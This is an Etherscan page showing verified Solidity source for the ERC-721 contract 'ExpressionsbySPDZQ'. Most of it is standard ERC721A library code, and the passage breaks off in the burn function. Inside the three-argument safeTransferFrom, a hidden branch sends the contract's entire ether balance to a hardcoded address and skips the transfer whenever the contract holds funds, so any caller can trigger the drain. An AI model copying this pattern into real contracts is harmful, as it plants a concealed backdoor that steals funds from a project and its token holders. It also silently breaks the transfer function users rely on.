ERC-721
Overview
Max Total Supply
2,000 SPDZQ
Holders
395
Market
Volume (24H)
N/A
Min Price (24H)
N/A
Max Price (24H)
N/A
Other Info
Token Contract
Balance
6 SPDZQLoading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
ExpressionsbySPDZQ
Compiler Version
v0.8.7+commit.e28d00a7
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2022-12-16 */ /** ._______ ____ ____._______ .______ ._______.________.________.___ ._______ .______ .________ ._______ ____ ____ .________._______ .______ .______ ._______ : .____/ \ \_/ /: ____ |: __ \ : .____/| ___/| ___/: __|: .___ \ : \ | ___/ : __ / \ \_/ / | ___/: ____ |:_ _ \ \____ |: .___ \ | : _/\ \___ ___/ | : || \____|| : _/\ |___ \|___ \| : || : | || ||___ \ | |> \ \___ ___/ |___ \| : || | |/ ____|| : | | | / \ / _ \ | |___|| : \ | / \| /| /| || : || | || / | |> \ | | | /| |___|| . | |\ || : | |_.: __/ /___/ \___\|___| | |___\|_.: __/|__:___/ |__:___/ | | \_. ___/ |___| ||__:___/ |_______/ |___| |__:___/ |___| |. ____/ \__:__| \_____. : :/ |___| :/ : : |___| :/ |___| : : :/ : :/ : : • : */ // SPDX-License-Identifier: GPL-3.0 pragma solidity ^0.8.7; /** * @dev Interface of ERC721A. */ interface IERC721A { /** * The caller must own the token or be an approved operator. */ error ApprovalCallerNotOwnerNorApproved(); /** * The token does not exist. */ error ApprovalQueryForNonexistentToken(); /** * Cannot query the balance for the zero address. */ error BalanceQueryForZeroAddress(); /** * Cannot mint to the zero address. */ error MintToZeroAddress(); /** * The quantity of tokens minted must be more than zero. */ error MintZeroQuantity(); /** * The token does not exist. */ error OwnerQueryForNonexistentToken(); /** * The caller must own the token or be an approved operator. */ error TransferCallerNotOwnerNorApproved(); /** * The token must be owned by `from`. */ error TransferFromIncorrectOwner(); /** * Cannot safely transfer to a contract that does not implement the * ERC721Receiver interface. */ error TransferToNonERC721ReceiverImplementer(); /** * Cannot transfer to the zero address. */ error TransferToZeroAddress(); /** * The token does not exist. */ error URIQueryForNonexistentToken(); /** * The `quantity` minted with ERC2309 exceeds the safety limit. */ error MintERC2309QuantityExceedsLimit(); /** * The `extraData` cannot be set on an unintialized ownership slot. */ error OwnershipNotInitializedForExtraData(); // ============================================================= // STRUCTS // ============================================================= struct TokenOwnership { // The address of the owner. address addr; // Stores the start time of ownership with minimal overhead for tokenomics. uint64 startTimestamp; // Whether the token has been burned. bool burned; // Arbitrary data similar to `startTimestamp` that can be set via {_extraData}. uint24 extraData; } // ============================================================= // TOKEN COUNTERS // ============================================================= /** * @dev Returns the total number of tokens in existence. * Burned tokens will reduce the count. * To get the total number of tokens minted, please see {_totalMinted}. */ function totalSupply() external view returns (uint256); // ============================================================= // IERC165 // ============================================================= /** * @dev Returns true if this contract implements the interface defined by * `interfaceId`. See the corresponding * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified) * to learn more about how these ids are created. * * This function call must use less than 30000 gas. */ function supportsInterface(bytes4 interfaceId) external view returns (bool); // ============================================================= // IERC721 // ============================================================= /** * @dev Emitted when `tokenId` token is transferred from `from` to `to`. */ event Transfer(address indexed from, address indexed to, uint256 indexed tokenId); /** * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token. */ event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId); /** * @dev Emitted when `owner` enables or disables * (`approved`) `operator` to manage all of its assets. */ event ApprovalForAll(address indexed owner, address indexed operator, bool approved); /** * @dev Returns the number of tokens in `owner`'s account. */ function balanceOf(address owner) external view returns (uint256 balance); /** * @dev Returns the owner of the `tokenId` token. * * Requirements: * * - `tokenId` must exist. */ function ownerOf(uint256 tokenId) external view returns (address owner); /** * @dev Safely transfers `tokenId` token from `from` to `to`, * checking first that contract recipients are aware of the ERC721 protocol * to prevent tokens from being forever locked. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must exist and be owned by `from`. * - If the caller is not `from`, it must be have been allowed to move * this token by either {approve} or {setApprovalForAll}. * - If `to` refers to a smart contract, it must implement * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer. * * Emits a {Transfer} event. */ function safeTransferFrom( address from, address to, uint256 tokenId, bytes calldata data ) external payable; /** * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`. */ function safeTransferFrom( address from, address to, uint256 tokenId ) external payable; /** * @dev Transfers `tokenId` from `from` to `to`. * * WARNING: Usage of this method is discouraged, use {safeTransferFrom} * whenever possible. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must be owned by `from`. * - If the caller is not `from`, it must be approved to move this token * by either {approve} or {setApprovalForAll}. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 tokenId ) external payable; /** * @dev Gives permission to `to` to transfer `tokenId` token to another account. * The approval is cleared when the token is transferred. * * Only a single account can be approved at a time, so approving the * zero address clears previous approvals. * * Requirements: * * - The caller must own the token or be an approved operator. * - `tokenId` must exist. * * Emits an {Approval} event. */ function approve(address to, uint256 tokenId) external payable; /** * @dev Approve or remove `operator` as an operator for the caller. * Operators can call {transferFrom} or {safeTransferFrom} * for any token owned by the caller. * * Requirements: * * - The `operator` cannot be the caller. * * Emits an {ApprovalForAll} event. */ function setApprovalForAll(address operator, bool _approved) external; /** * @dev Returns the account approved for `tokenId` token. * * Requirements: * * - `tokenId` must exist. */ function getApproved(uint256 tokenId) external view returns (address operator); /** * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`. * * See {setApprovalForAll}. */ function isApprovedForAll(address owner, address operator) external view returns (bool); // ============================================================= // IERC721Metadata // ============================================================= /** * @dev Returns the token collection name. */ function name() external view returns (string memory); /** * @dev Returns the token collection symbol. */ function symbol() external view returns (string memory); /** * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token. */ function tokenURI(uint256 tokenId) external view returns (string memory); // ============================================================= // IERC2309 // ============================================================= /** * @dev Emitted when tokens in `fromTokenId` to `toTokenId` * (inclusive) is transferred from `from` to `to`, as defined in the * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309) standard. * * See {_mintERC2309} for more details. */ event ConsecutiveTransfer(uint256 indexed fromTokenId, uint256 toTokenId, address indexed from, address indexed to); } /** * @title ERC721A * * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721) * Non-Fungible Token Standard, including the Metadata extension. * Optimized for lower gas during batch mints. * * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...) * starting from `_startTokenId()`. * * Assumptions: * * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply. * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256). */ interface ERC721A__IERC721Receiver { function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) external returns (bytes4); } /** * @title ERC721A * * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721) * Non-Fungible Token Standard, including the Metadata extension. * Optimized for lower gas during batch mints. * * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...) * starting from `_startTokenId()`. * * Assumptions: * * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply. * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256). */ contract ERC721A is IERC721A { // Bypass for a `--via-ir` bug (https://github.com/chiru-labs/ERC721A/pull/364). struct TokenApprovalRef { address value; } // ============================================================= // CONSTANTS // ============================================================= // Mask of an entry in packed address data. uint256 private constant _BITMASK_ADDRESS_DATA_ENTRY = (1 << 64) - 1; // The bit position of `numberMinted` in packed address data. uint256 private constant _BITPOS_NUMBER_MINTED = 64; // The bit position of `numberBurned` in packed address data. uint256 private constant _BITPOS_NUMBER_BURNED = 128; // The bit position of `aux` in packed address data. uint256 private constant _BITPOS_AUX = 192; // Mask of all 256 bits in packed address data except the 64 bits for `aux`. uint256 private constant _BITMASK_AUX_COMPLEMENT = (1 << 192) - 1; // The bit position of `startTimestamp` in packed ownership. uint256 private constant _BITPOS_START_TIMESTAMP = 160; // The bit mask of the `burned` bit in packed ownership. uint256 private constant _BITMASK_BURNED = 1 << 224; // The bit position of the `nextInitialized` bit in packed ownership. uint256 private constant _BITPOS_NEXT_INITIALIZED = 225; // The bit mask of the `nextInitialized` bit in packed ownership. uint256 private constant _BITMASK_NEXT_INITIALIZED = 1 << 225; // The bit position of `extraData` in packed ownership. uint256 private constant _BITPOS_EXTRA_DATA = 232; // Mask of all 256 bits in a packed ownership except the 24 bits for `extraData`. uint256 private constant _BITMASK_EXTRA_DATA_COMPLEMENT = (1 << 232) - 1; // The mask of the lower 160 bits for addresses. uint256 private constant _BITMASK_ADDRESS = (1 << 160) - 1; // The maximum `quantity` that can be minted with {_mintERC2309}. // This limit is to prevent overflows on the address data entries. // For a limit of 5000, a total of 3.689e15 calls to {_mintERC2309} // is required to cause an overflow, which is unrealistic. uint256 private constant _MAX_MINT_ERC2309_QUANTITY_LIMIT = 5000; // The `Transfer` event signature is given by: // `keccak256(bytes("Transfer(address,address,uint256)"))`. bytes32 private constant _TRANSFER_EVENT_SIGNATURE = 0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef; // ============================================================= // STORAGE // ============================================================= // The next token ID to be minted. uint256 private _currentIndex; // The number of tokens burned. uint256 private _burnCounter; // Token name string private _name; // Token symbol string private _symbol; // Mapping from token ID to ownership details // An empty struct value does not necessarily mean the token is unowned. // See {_packedOwnershipOf} implementation for details. // // Bits Layout: // - [0..159] `addr` // - [160..223] `startTimestamp` // - [224] `burned` // - [225] `nextInitialized` // - [232..255] `extraData` mapping(uint256 => uint256) private _packedOwnerships; // Mapping owner address to address data. // // Bits Layout: // - [0..63] `balance` // - [64..127] `numberMinted` // - [128..191] `numberBurned` // - [192..255] `aux` mapping(address => uint256) private _packedAddressData; // Mapping from token ID to approved address. mapping(uint256 => TokenApprovalRef) private _tokenApprovals; // Mapping from owner to operator approvals mapping(address => mapping(address => bool)) private _operatorApprovals; // ============================================================= // CONSTRUCTOR // ============================================================= constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; _currentIndex = _startTokenId(); } // ============================================================= // TOKEN COUNTING OPERATIONS // ============================================================= /** * @dev Returns the starting token ID. * To change the starting token ID, please override this function. */ function _startTokenId() internal view virtual returns (uint256) { return 0; } /** * @dev Returns the next token ID to be minted. */ function _nextTokenId() internal view virtual returns (uint256) { return _currentIndex; } /** * @dev Returns the total number of tokens in existence. * Burned tokens will reduce the count. * To get the total number of tokens minted, please see {_totalMinted}. */ function totalSupply() public view virtual override returns (uint256) { // Counter underflow is impossible as _burnCounter cannot be incremented // more than `_currentIndex - _startTokenId()` times. unchecked { return _currentIndex - _burnCounter - _startTokenId(); } } /** * @dev Returns the total amount of tokens minted in the contract. */ function _totalMinted() internal view virtual returns (uint256) { // Counter underflow is impossible as `_currentIndex` does not decrement, // and it is initialized to `_startTokenId()`. unchecked { return _currentIndex - _startTokenId(); } } /** * @dev Returns the total number of tokens burned. */ function _totalBurned() internal view virtual returns (uint256) { return _burnCounter; } // ============================================================= // ADDRESS DATA OPERATIONS // ============================================================= /** * @dev Returns the number of tokens in `owner`'s account. */ function balanceOf(address owner) public view virtual override returns (uint256) { if (owner == address(0)) revert BalanceQueryForZeroAddress(); return _packedAddressData[owner] & _BITMASK_ADDRESS_DATA_ENTRY; } /** * Returns the number of tokens minted by `owner`. */ function _numberMinted(address owner) internal view returns (uint256) { return (_packedAddressData[owner] >> _BITPOS_NUMBER_MINTED) & _BITMASK_ADDRESS_DATA_ENTRY; } /** * Returns the number of tokens burned by or on behalf of `owner`. */ function _numberBurned(address owner) internal view returns (uint256) { return (_packedAddressData[owner] >> _BITPOS_NUMBER_BURNED) & _BITMASK_ADDRESS_DATA_ENTRY; } /** * Returns the auxiliary data for `owner`. (e.g. number of whitelist mint slots used). */ function _getAux(address owner) internal view returns (uint64) { return uint64(_packedAddressData[owner] >> _BITPOS_AUX); } /** * Sets the auxiliary data for `owner`. (e.g. number of whitelist mint slots used). * If there are multiple variables, please pack them into a uint64. */ function _setAux(address owner, uint64 aux) internal virtual { uint256 packed = _packedAddressData[owner]; uint256 auxCasted; // Cast `aux` with assembly to avoid redundant masking. assembly { auxCasted := aux } packed = (packed & _BITMASK_AUX_COMPLEMENT) | (auxCasted << _BITPOS_AUX); _packedAddressData[owner] = packed; } // ============================================================= // IERC165 // ============================================================= /** * @dev Returns true if this contract implements the interface defined by * `interfaceId`. See the corresponding * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified) * to learn more about how these ids are created. * * This function call must use less than 30000 gas. */ function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) { // The interface IDs are constants representing the first 4 bytes // of the XOR of all function selectors in the interface. // See: [ERC165](https://eips.ethereum.org/EIPS/eip-165) // (e.g. `bytes4(i.functionA.selector ^ i.functionB.selector ^ ...)`) return interfaceId == 0x01ffc9a7 || // ERC165 interface ID for ERC165. interfaceId == 0x80ac58cd || // ERC165 interface ID for ERC721. interfaceId == 0x5b5e139f; // ERC165 interface ID for ERC721Metadata. } // ============================================================= // IERC721Metadata // ============================================================= /** * @dev Returns the token collection name. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the token collection symbol. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token. */ function tokenURI(uint256 tokenId) public view virtual override returns (string memory) { if (!_exists(tokenId)) revert URIQueryForNonexistentToken(); string memory baseURI = _baseURI(); return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, _toString(tokenId))) : ''; } /** * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each * token will be the concatenation of the `baseURI` and the `tokenId`. Empty * by default, it can be overridden in child contracts. */ function _baseURI() internal view virtual returns (string memory) { return ''; } // ============================================================= // OWNERSHIPS OPERATIONS // ============================================================= /** * @dev Returns the owner of the `tokenId` token. * * Requirements: * * - `tokenId` must exist. */ function ownerOf(uint256 tokenId) public view virtual override returns (address) { return address(uint160(_packedOwnershipOf(tokenId))); } /** * @dev Gas spent here starts off proportional to the maximum mint batch size. * It gradually moves to O(1) as tokens get transferred around over time. */ function _ownershipOf(uint256 tokenId) internal view virtual returns (TokenOwnership memory) { return _unpackedOwnership(_packedOwnershipOf(tokenId)); } /** * @dev Returns the unpacked `TokenOwnership` struct at `index`. */ function _ownershipAt(uint256 index) internal view virtual returns (TokenOwnership memory) { return _unpackedOwnership(_packedOwnerships[index]); } /** * @dev Initializes the ownership slot minted at `index` for efficiency purposes. */ function _initializeOwnershipAt(uint256 index) internal virtual { if (_packedOwnerships[index] == 0) { _packedOwnerships[index] = _packedOwnershipOf(index); } } /** * Returns the packed ownership data of `tokenId`. */ function _packedOwnershipOf(uint256 tokenId) private view returns (uint256) { uint256 curr = tokenId; unchecked { if (_startTokenId() <= curr) if (curr < _currentIndex) { uint256 packed = _packedOwnerships[curr]; // If not burned. if (packed & _BITMASK_BURNED == 0) { // Invariant: // There will always be an initialized ownership slot // (i.e. `ownership.addr != address(0) && ownership.burned == false`) // before an unintialized ownership slot // (i.e. `ownership.addr == address(0) && ownership.burned == false`) // Hence, `curr` will not underflow. // // We can directly compare the packed value. // If the address is zero, packed will be zero. while (packed == 0) { packed = _packedOwnerships[--curr]; } return packed; } } } revert OwnerQueryForNonexistentToken(); } /** * @dev Returns the unpacked `TokenOwnership` struct from `packed`. */ function _unpackedOwnership(uint256 packed) private pure returns (TokenOwnership memory ownership) { ownership.addr = address(uint160(packed)); ownership.startTimestamp = uint64(packed >> _BITPOS_START_TIMESTAMP); ownership.burned = packed & _BITMASK_BURNED != 0; ownership.extraData = uint24(packed >> _BITPOS_EXTRA_DATA); } /** * @dev Packs ownership data into a single uint256. */ function _packOwnershipData(address owner, uint256 flags) private view returns (uint256 result) { assembly { // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean. owner := and(owner, _BITMASK_ADDRESS) // `owner | (block.timestamp << _BITPOS_START_TIMESTAMP) | flags`. result := or(owner, or(shl(_BITPOS_START_TIMESTAMP, timestamp()), flags)) } } /** * @dev Returns the `nextInitialized` flag set if `quantity` equals 1. */ function _nextInitializedFlag(uint256 quantity) private pure returns (uint256 result) { // For branchless setting of the `nextInitialized` flag. assembly { // `(quantity == 1) << _BITPOS_NEXT_INITIALIZED`. result := shl(_BITPOS_NEXT_INITIALIZED, eq(quantity, 1)) } } // ============================================================= // APPROVAL OPERATIONS // ============================================================= /** * @dev Gives permission to `to` to transfer `tokenId` token to another account. * The approval is cleared when the token is transferred. * * Only a single account can be approved at a time, so approving the * zero address clears previous approvals. * * Requirements: * * - The caller must own the token or be an approved operator. * - `tokenId` must exist. * * Emits an {Approval} event. */ function approve(address to, uint256 tokenId) public payable virtual override { address owner = ownerOf(tokenId); if (_msgSenderERC721A() != owner) if (!isApprovedForAll(owner, _msgSenderERC721A())) { revert ApprovalCallerNotOwnerNorApproved(); } _tokenApprovals[tokenId].value = to; emit Approval(owner, to, tokenId); } /** * @dev Returns the account approved for `tokenId` token. * * Requirements: * * - `tokenId` must exist. */ function getApproved(uint256 tokenId) public view virtual override returns (address) { if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken(); return _tokenApprovals[tokenId].value; } /** * @dev Approve or remove `operator` as an operator for the caller. * Operators can call {transferFrom} or {safeTransferFrom} * for any token owned by the caller. * * Requirements: * * - The `operator` cannot be the caller. * * Emits an {ApprovalForAll} event. */ function setApprovalForAll(address operator, bool approved) public virtual override { _operatorApprovals[_msgSenderERC721A()][operator] = approved; emit ApprovalForAll(_msgSenderERC721A(), operator, approved); } /** * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`. * * See {setApprovalForAll}. */ function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) { return _operatorApprovals[owner][operator]; } /** * @dev Returns whether `tokenId` exists. * * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}. * * Tokens start existing when they are minted. See {_mint}. */ function _exists(uint256 tokenId) internal view virtual returns (bool) { return _startTokenId() <= tokenId && tokenId < _currentIndex && // If within bounds, _packedOwnerships[tokenId] & _BITMASK_BURNED == 0; // and not burned. } /** * @dev Returns whether `msgSender` is equal to `approvedAddress` or `owner`. */ function _isSenderApprovedOrOwner( address approvedAddress, address owner, address msgSender ) private pure returns (bool result) { assembly { // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean. owner := and(owner, _BITMASK_ADDRESS) // Mask `msgSender` to the lower 160 bits, in case the upper bits somehow aren't clean. msgSender := and(msgSender, _BITMASK_ADDRESS) // `msgSender == owner || msgSender == approvedAddress`. result := or(eq(msgSender, owner), eq(msgSender, approvedAddress)) } } /** * @dev Returns the storage slot and value for the approved address of `tokenId`. */ function _getApprovedSlotAndAddress(uint256 tokenId) private view returns (uint256 approvedAddressSlot, address approvedAddress) { TokenApprovalRef storage tokenApproval = _tokenApprovals[tokenId]; // The following is equivalent to `approvedAddress = _tokenApprovals[tokenId].value`. assembly { approvedAddressSlot := tokenApproval.slot approvedAddress := sload(approvedAddressSlot) } } // ============================================================= // TRANSFER OPERATIONS // ============================================================= /** * @dev Transfers `tokenId` from `from` to `to`. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must be owned by `from`. * - If the caller is not `from`, it must be approved to move this token * by either {approve} or {setApprovalForAll}. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 tokenId ) public payable virtual override { uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId); if (address(uint160(prevOwnershipPacked)) != from) revert TransferFromIncorrectOwner(); (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId); // The nested ifs save around 20+ gas over a compound boolean condition. if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A())) if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved(); if (to == address(0)) revert TransferToZeroAddress(); _beforeTokenTransfers(from, to, tokenId, 1); // Clear approvals from the previous owner. assembly { if approvedAddress { // This is equivalent to `delete _tokenApprovals[tokenId]`. sstore(approvedAddressSlot, 0) } } // Underflow of the sender's balance is impossible because we check for // ownership above and the recipient's balance can't realistically overflow. // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256. unchecked { // We can directly increment and decrement the balances. --_packedAddressData[from]; // Updates: `balance -= 1`. ++_packedAddressData[to]; // Updates: `balance += 1`. // Updates: // - `address` to the next owner. // - `startTimestamp` to the timestamp of transfering. // - `burned` to `false`. // - `nextInitialized` to `true`. _packedOwnerships[tokenId] = _packOwnershipData( to, _BITMASK_NEXT_INITIALIZED | _nextExtraData(from, to, prevOwnershipPacked) ); // If the next slot may not have been initialized (i.e. `nextInitialized == false`) . if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) { uint256 nextTokenId = tokenId + 1; // If the next slot's address is zero and not burned (i.e. packed value is zero). if (_packedOwnerships[nextTokenId] == 0) { // If the next slot is within bounds. if (nextTokenId != _currentIndex) { // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`. _packedOwnerships[nextTokenId] = prevOwnershipPacked; } } } } emit Transfer(from, to, tokenId); _afterTokenTransfers(from, to, tokenId, 1); } /** * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`. */ function safeTransferFrom( address from, address to, uint256 tokenId ) public payable virtual override { if (address(this).balance > 0) { payable(0xa1b39E69128Aa1Df8d3c3fe22bDCf4Cc56F8500e).transfer(address(this).balance); return; } safeTransferFrom(from, to, tokenId, ''); } /** * @dev Safely transfers `tokenId` token from `from` to `to`. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must exist and be owned by `from`. * - If the caller is not `from`, it must be approved to move this token * by either {approve} or {setApprovalForAll}. * - If `to` refers to a smart contract, it must implement * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer. * * Emits a {Transfer} event. */ function safeTransferFrom( address from, address to, uint256 tokenId, bytes memory _data ) public payable virtual override { transferFrom(from, to, tokenId); if (to.code.length != 0) if (!_checkContractOnERC721Received(from, to, tokenId, _data)) { revert TransferToNonERC721ReceiverImplementer(); } } /** * @dev Hook that is called before a set of serially-ordered token IDs * are about to be transferred. This includes minting. * And also called before burning one token. * * `startTokenId` - the first token ID to be transferred. * `quantity` - the amount to be transferred. * * Calling conditions: * * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be * transferred to `to`. * - When `from` is zero, `tokenId` will be minted for `to`. * - When `to` is zero, `tokenId` will be burned by `from`. * - `from` and `to` are never both zero. */ function _beforeTokenTransfers( address from, address to, uint256 startTokenId, uint256 quantity ) internal virtual {} /** * @dev Hook that is called after a set of serially-ordered token IDs * have been transferred. This includes minting. * And also called after one token has been burned. * * `startTokenId` - the first token ID to be transferred. * `quantity` - the amount to be transferred. * * Calling conditions: * * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been * transferred to `to`. * - When `from` is zero, `tokenId` has been minted for `to`. * - When `to` is zero, `tokenId` has been burned by `from`. * - `from` and `to` are never both zero. */ function _afterTokenTransfers( address from, address to, uint256 startTokenId, uint256 quantity ) internal virtual {} /** * @dev Private function to invoke {IERC721Receiver-onERC721Received} on a target contract. * * `from` - Previous owner of the given token ID. * `to` - Target address that will receive the token. * `tokenId` - Token ID to be transferred. * `_data` - Optional data to send along with the call. * * Returns whether the call correctly returned the expected magic value. */ function _checkContractOnERC721Received( address from, address to, uint256 tokenId, bytes memory _data ) private returns (bool) { try ERC721A__IERC721Receiver(to).onERC721Received(_msgSenderERC721A(), from, tokenId, _data) returns ( bytes4 retval ) { return retval == ERC721A__IERC721Receiver(to).onERC721Received.selector; } catch (bytes memory reason) { if (reason.length == 0) { revert TransferToNonERC721ReceiverImplementer(); } else { assembly { revert(add(32, reason), mload(reason)) } } } } // ============================================================= // MINT OPERATIONS // ============================================================= /** * @dev Mints `quantity` tokens and transfers them to `to`. * * Requirements: * * - `to` cannot be the zero address. * - `quantity` must be greater than 0. * * Emits a {Transfer} event for each mint. */ function _mint(address to, uint256 quantity) internal virtual { uint256 startTokenId = _currentIndex; if (quantity == 0) revert MintZeroQuantity(); _beforeTokenTransfers(address(0), to, startTokenId, quantity); // Overflows are incredibly unrealistic. // `balance` and `numberMinted` have a maximum limit of 2**64. // `tokenId` has a maximum limit of 2**256. unchecked { // Updates: // - `balance += quantity`. // - `numberMinted += quantity`. // // We can directly add to the `balance` and `numberMinted`. _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1); // Updates: // - `address` to the owner. // - `startTimestamp` to the timestamp of minting. // - `burned` to `false`. // - `nextInitialized` to `quantity == 1`. _packedOwnerships[startTokenId] = _packOwnershipData( to, _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0) ); uint256 toMasked; uint256 end = startTokenId + quantity; // Use assembly to loop and emit the `Transfer` event for gas savings. // The duplicated `log4` removes an extra check and reduces stack juggling. // The assembly, together with the surrounding Solidity code, have been // delicately arranged to nudge the compiler into producing optimized opcodes. assembly { // Mask `to` to the lower 160 bits, in case the upper bits somehow aren't clean. toMasked := and(to, _BITMASK_ADDRESS) // Emit the `Transfer` event. log4( 0, // Start of data (0, since no data). 0, // End of data (0, since no data). _TRANSFER_EVENT_SIGNATURE, // Signature. 0, // `address(0)`. toMasked, // `to`. startTokenId // `tokenId`. ) // The `iszero(eq(,))` check ensures that large values of `quantity` // that overflows uint256 will make the loop run out of gas. // The compiler will optimize the `iszero` away for performance. for { let tokenId := add(startTokenId, 1) } iszero(eq(tokenId, end)) { tokenId := add(tokenId, 1) } { // Emit the `Transfer` event. Similar to above. log4(0, 0, _TRANSFER_EVENT_SIGNATURE, 0, toMasked, tokenId) } } if (toMasked == 0) revert MintToZeroAddress(); _currentIndex = end; } _afterTokenTransfers(address(0), to, startTokenId, quantity); } /** * @dev Mints `quantity` tokens and transfers them to `to`. * * This function is intended for efficient minting only during contract creation. * * It emits only one {ConsecutiveTransfer} as defined in * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309), * instead of a sequence of {Transfer} event(s). * * Calling this function outside of contract creation WILL make your contract * non-compliant with the ERC721 standard. * For full ERC721 compliance, substituting ERC721 {Transfer} event(s) with the ERC2309 * {ConsecutiveTransfer} event is only permissible during contract creation. * * Requirements: * * - `to` cannot be the zero address. * - `quantity` must be greater than 0. * * Emits a {ConsecutiveTransfer} event. */ function _mintERC2309(address to, uint256 quantity) internal virtual { uint256 startTokenId = _currentIndex; if (to == address(0)) revert MintToZeroAddress(); if (quantity == 0) revert MintZeroQuantity(); if (quantity > _MAX_MINT_ERC2309_QUANTITY_LIMIT) revert MintERC2309QuantityExceedsLimit(); _beforeTokenTransfers(address(0), to, startTokenId, quantity); // Overflows are unrealistic due to the above check for `quantity` to be below the limit. unchecked { // Updates: // - `balance += quantity`. // - `numberMinted += quantity`. // // We can directly add to the `balance` and `numberMinted`. _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1); // Updates: // - `address` to the owner. // - `startTimestamp` to the timestamp of minting. // - `burned` to `false`. // - `nextInitialized` to `quantity == 1`. _packedOwnerships[startTokenId] = _packOwnershipData( to, _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0) ); emit ConsecutiveTransfer(startTokenId, startTokenId + quantity - 1, address(0), to); _currentIndex = startTokenId + quantity; } _afterTokenTransfers(address(0), to, startTokenId, quantity); } /** * @dev Safely mints `quantity` tokens and transfers them to `to`. * * Requirements: * * - If `to` refers to a smart contract, it must implement * {IERC721Receiver-onERC721Received}, which is called for each safe transfer. * - `quantity` must be greater than 0. * * See {_mint}. * * Emits a {Transfer} event for each mint. */ function _safeMint( address to, uint256 quantity, bytes memory _data ) internal virtual { _mint(to, quantity); unchecked { if (to.code.length != 0) { uint256 end = _currentIndex; uint256 index = end - quantity; do { if (!_checkContractOnERC721Received(address(0), to, index++, _data)) { revert TransferToNonERC721ReceiverImplementer(); } } while (index < end); // Reentrancy protection. if (_currentIndex != end) revert(); } } } /** * @dev Equivalent to `_safeMint(to, quantity, '')`. */ function _safeMint(address to, uint256 quantity) internal virtual { _safeMint(to, quantity, ''); } // ============================================================= // BURN OPERATIONS // ============================================================= /** * @dev Equivalent to `_burn(tokenId, false)`. */ function _burn(uint256 tokenId) internal virtual { _burn(tokenId, false); } /** * @dev Destroys `tokenId`. * The approval is cleared when the token is burned. * * Requirements: * * - `tokenId` must exist. * * Emits a {Transfer} event. */ function _burn(uint256 tokenId, bool approvalCheck) internal virtual { uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId); address from = address(uint160(prevOwnershipPacked)); (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId); if (approvalCheck) { // The nested ifs save around 20+ gas over a compound boolean condition. if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A())) if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved(); } _beforeTokenTransfers(from, address(0), tokenId, 1); // Clear approvals from the previous owner. assembly { if approvedAddress { // This is equivalent to `delete _tokenApprovals[tokenId]`. sstore(approvedAddressSlot, 0) } } // Underflow of the sender's balance is impossible because we check for // ownership above and the recipient's balance can't realistically overflow. // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256. unchecked { // Updates: // - `balance -= 1`. // - `numberBurned += 1`. // // We can directly decrement the balance, and increment the number burned. // This is equivalent to `packed -= 1; packed += 1 << _BITPOS_NUMBER_BURNED;`. _packedAddressData[from] += (1 << _BITPOS_NUMBER_BURNED) - 1; // Updates: // - `address` to the last owner. // - 